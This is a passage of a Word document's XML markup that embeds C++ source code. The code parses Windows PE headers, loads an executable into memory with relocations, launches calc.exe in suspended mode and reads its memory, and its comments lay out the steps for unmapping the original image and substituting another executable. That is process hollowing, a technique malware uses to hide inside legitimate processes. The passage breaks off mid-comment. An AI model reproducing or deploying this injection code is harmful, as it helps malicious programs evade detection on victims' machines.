          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  PE_Header peH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  fread(&amp;peH, sizeof(PE_Header), 1, fp);</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//printf("Size of option header = %d\n", peH.sizeOfOptionHeader);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  //printf("Number of sections = %d\n", peH.numSections);</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if(peH.sizeOfOptionHeader != sizeof(PE_ExtHeader))</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printf("Unexpected option header size.\n");</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return false;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 read PE Ext Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  PE_ExtHeader peXH;</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fread(&amp;peXH, sizeof(PE_ExtHeader), 1, fp);</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//printf("Import table address = %X\n", peXH.importTableAddress);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  //printf("Import table size = %X\n", peXH.importTableSize);</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lastRenderedPageBreak/>
        <w:t>  //printf("Import address table address = %X\n", peXH.importAddressTableAddress);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  //printf("Import address table size = %X\n", peXH.importAddressTableSize);</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 read the sections</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  SectionHeader *secHdr = new SectionHeader[peH.numSections];</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fread(secHdr, sizeof(SectionHeader) * peH.numSections, 1, fp);</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*outMZ = mzH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  *outPE = peH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  *outpeXH = peXH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  *outSecHdr = secHdr;</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return true;</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This function calculates the size required to load an EXE into memory with proper alignment.</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int calcTotalImageSize(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>             SectionHeader *inSecHdr)</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int result = 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  int alignment = inpeXH-&gt;sectionAlignment;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if(inpeXH-&gt;sizeOfHeaders % alignment == 0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    result += inpeXH-&gt;sizeOfHeaders;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  else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int val = inpeXH-&gt;sizeOfHeaders / alignment;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    val++;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    result += (val * alignment);</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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  for(int i = 0; i &lt; inPE-&gt;numSections; i++)</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if(inSecHdr[i].virtualSize)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if(inSecHdr[i].virtualSize % alignment == 0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        result += inSecHdr[i].virtualSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      else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int val = inSecHdr[i].virtualSize / alignment;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        val++;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        result += (val * alignment);</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return result;</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This function calculates the aligned size of a section</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unsigned long getAlignedSize(unsigned long curSize, unsigned long alignment)</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if(curSize % alignment == 0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return curSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  else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int val = curSize / alignment;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    val++;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return (val * alignment);</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lastRenderedPageBreak/>
        <w:t>*******************************************</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This function loads a PE file into memory with proper alignment.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// Enough memory must be allocated at ptrLoc.</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bool loadPE(FILE *fp, MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      SectionHeader *inSecHdr, LPVOID ptrLoc)</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char *outPtr = (char *)ptrLoc;</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fseek(fp, 0, SEEK_SET);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long headerSize = inpeXH-&gt;sizeOfHeaders;</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 certain PE files have sectionHeaderSize value &gt; size of PE file itself.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  // this loop handles this situation by find the section that is nearest to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  // PE header.</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for(int i = 0; i &lt; inPE-&gt;numSections; i++)</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if(inSecHdr[i].pointerToRawData &lt; headerSize)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      headerSize = inSecHdr[i].pointerToRawData;</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 read the PE header</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long readSize = fread(outPtr, 1, headerSize, fp);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  //printf("HeaderSize = %d\n", headerSize);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  if(readSize != headerSize)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printf("Error reading headers (%d %d)\n", readSize, headerSize);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return false;    </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outPtr += getAlignedSize(inpeXH-&gt;sizeOfHeaders, inpeXH-&gt;sectionAlignment);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 read the sections</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lastRenderedPageBreak/>
        <w:t>  for(i = 0; i &lt; inPE-&gt;numSections; i++)</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if(inSecHdr[i].sizeOfRawData &gt; 0)</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unsigned long toRead = inSecHdr[i].sizeOfRawData;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      if(toRead &gt; inSecHdr[i].virtualSize)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        toRead = inSecHdr[i].virtualSize;</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fseek(fp, inSecHdr[i].pointerToRawData, SEEK_SET);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      readSize = fread(outPtr, 1, toRead, fp);</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if(readSize != toRead)</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printf("Error reading section %d\n", i);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        return false;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outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH-&gt;sectionAlignment);</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else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 this handles the case where the PE file has an empty section. E.g. UPX0 section</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      // in UPXed files.</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if(inSecHdr[i].virtualSize)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH-&gt;sectionAlignment);</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return true;</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struct FixupBlock</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unsigned long pageRVA;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long blockSize;</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lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// This function loads a PE file into memory with proper alignment.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// Enough memory must be allocated at ptrLoc.</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void doRelocation(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>          SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD newBase)</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if(inpeXH-&gt;relocationTableAddress &amp;&amp; inpeXH-&gt;relocationTableSize)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FixupBlock *fixBlk = (FixupBlock *)((char *)ptrLoc + inpeXH-&gt;relocationTableAddress);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    long delta = newBase - inpeXH-&gt;imageBase;</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while(fixBlk-&gt;blockSize)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//printf("Addr = %X\n", fixBlk-&gt;pageRVA);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      //printf("Size = %X\n", fixBlk-&gt;blockSize);</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int numEntries = (fixBlk-&gt;blockSize - sizeof(FixupBlock)) &gt;&gt; 1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      //printf("Num Entries = %d\n", numEntries);</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unsigned short *offsetPtr = (unsigned short *)(fixBlk + 1);</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for(int i = 0; i &lt; numEntries; i++)</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DWORD *codeLoc = (DWORD *)((char *)ptrLoc + fixBlk-&gt;pageRVA + (*offsetPtr &amp; 0x0FFF));</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int relocType = (*offsetPtr &amp; 0xF000) &gt;&gt; 12;</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//printf("Val = %X\n", *offsetPtr);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        //printf("Type = %X\n", relocType);</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if(relocType == 3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>          *codeLoc = ((DWORD)*codeLoc) + delta;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        else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lastRenderedPageBreak/>
        <w:t>          printf("Unknown relocation type = %d\n", relocType);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offsetPtr++;</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fixBlk = (FixupBlock *)offsetPtr;</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  </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#define TARGETPROC "calc.exe"</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typedef struct _PROCINFO</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DWORD baseAddr;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  DWORD imageSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>} PROCINFO;</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Creates the original EXE in suspended mode and returns its info in the PROCINFO structure.</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BOOL createChild(PPROCESS_INFORMATION pi, PCONTEXT ctx, PROCINFO *outChildProcInfo)</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STARTUPINFO si = {0};</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if(CreateProcess(NULL, TARGETPROC,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>             NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &amp;si, pi))    </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ctx-&gt;ContextFlags=CONTEXT_FULL;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    GetThreadContext(pi-&gt;hThread, ctx);</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DWORD *pebInfo = (DWORD *)ctx-&gt;Ebx;</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lastRenderedPageBreak/>
        <w:t>    DWORD read;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    ReadProcessMemory(pi-&gt;hProcess, &amp;pebInfo[2], (LPVOID)&amp;(outChildProcInfo-&gt;baseAddr), sizeof(DWORD), &amp;read);</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DWORD curAddr = outChildProcInfo-&gt;baseAddr;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    MEMORY_BASIC_INFORMATION memInfo;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    while(VirtualQueryEx(pi-&gt;hProcess, (LPVOID)curAddr, &amp;memInfo, sizeof(memInfo)))</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if(memInfo.State == MEM_FREE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        break;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      curAddr += memInfo.RegionSize;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outChildProcInfo-&gt;imageSize = (DWORD)curAddr - (DWORD)outChildProcInfo-&gt;baseAddr;</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return TRUE;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return FALSE;</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Returns true if the PE file has a relocation table</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BOOL hasRelocationTable(PE_ExtHeader *inpeXH)</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if(inpeXH-&gt;relocationTableAddress &amp;&amp; inpeXH-&gt;relocationTableSize)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return TRUE;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return FALSE;</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typedef DWORD (WINAPI *PTRZwUnmapViewOfSection)(IN HANDLE ProcessHandle, IN PVOID BaseAddress);</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lastRenderedPageBreak/>
        <w:br/>
        <w:t>//**********************************************************************************************************</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To replace the original EXE with another one we do the following.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// 1) Create the original EXE process in suspended mode.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// 2) Unmap the image of the original EXE.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// 3) Allocate memory at the baseaddress of the new EXE.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// 4) Load the new EXE image into the allocated memory.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// 5) Windows will do the necessary imports and load the required DLLs for us when we resume the suspended </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>//   thread.</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When the original EXE process is created in suspend mode, GetThreadContext returns these useful</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// register values.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// EAX - process entry point</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
